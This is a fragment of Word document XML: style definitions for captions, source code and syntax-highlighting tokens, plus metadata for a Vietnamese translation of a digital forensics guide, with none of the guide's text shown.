  <w:style w:type="paragraph" w:customStyle="1" w:styleId="28">
    <w:name w:val="Abstract Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="29"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="300" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="345A8A"/>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paragraph" w:customStyle="1" w:styleId="31">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vi-VN" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="3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3">
    <w:name w:val="Definition Term"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="34"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="Definition"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="36">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="37"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="39">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="19"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="DejaVu Sans Mono"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:eastAsia="DejaVu Sans Mono"/>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="19"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">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3">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="44">
    <w:name w:val="DataTypeTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="902000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="BaseNTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="FloatTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="48">
    <w:name w:val="ConstantTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="880000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="49">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="StringTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="52">
    <w:name w:val="VerbatimStringTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="53">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="54">
    <w:name w:val="ImportTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="55">
    <w:name w:val="CommentTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="56">
    <w:name w:val="DocumentationTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="BA2121"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="57">
    <w:name w:val="AnnotationTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="58">
    <w:name w:val="CommentVarTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="59">
    <w:name w:val="OtherTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="FunctionTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="06287E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="VariableTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="19177C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="62">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="63">
    <w:name w:val="OperatorTok"/>
    <w:basedOn w:val="39"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="64">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="65">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="66">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="67">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="68">
    <w:name w:val="RegionMarkerTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="69">
    <w:name w:val="InformationTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="WarningTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="60A0B0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="AlertTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="72">
    <w:name w:val="ErrorTok"/>
    <w:basedOn w:val="39"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="73">
    <w:name w:val="NormalTok"/>
    <w:basedOn w:val="39"/>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49</Pages>
  <Words>1401</Words>
  <Characters>5087</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6404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2026-07-10T08:17:00Z</dcterms:created>
  <dc:creator>The Cyber Bite - Bản dịch tiếng Việt</dc:creator>
  <cp:keywords>DFIR, Digital Forensics, Điều tra số, Pháp chứng số</cp:keywords>
  <cp:lastModifiedBy>Saco NoLove</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-10T08:37:31Z</dcterms:modified>
  <dc:subject>Bản dịch tiếng Việt Digital Forensics Complete Guide</dc:subject>
  <dc:title>Điều tra số - Hướng dẫn toàn diện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Ấn bản 2026</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="subtitle">
    <vt:lpwstr>Từ nguyên lý cơ bản đến vai trò nhân chứng chuyên gia</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZDk3NTBlOGQ2MjI3M2ExZjJmNjE2ZWJjNzBiZWQ2N2YiLCJ1c2VySWQiOiIxMzkyMDA2MDM3OTk5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ICV">
    <vt:lpwstr>C01FEEF502904B78A8185FD852D51978_12</vt:lpwstr>
  </property>
</Properties>
</file>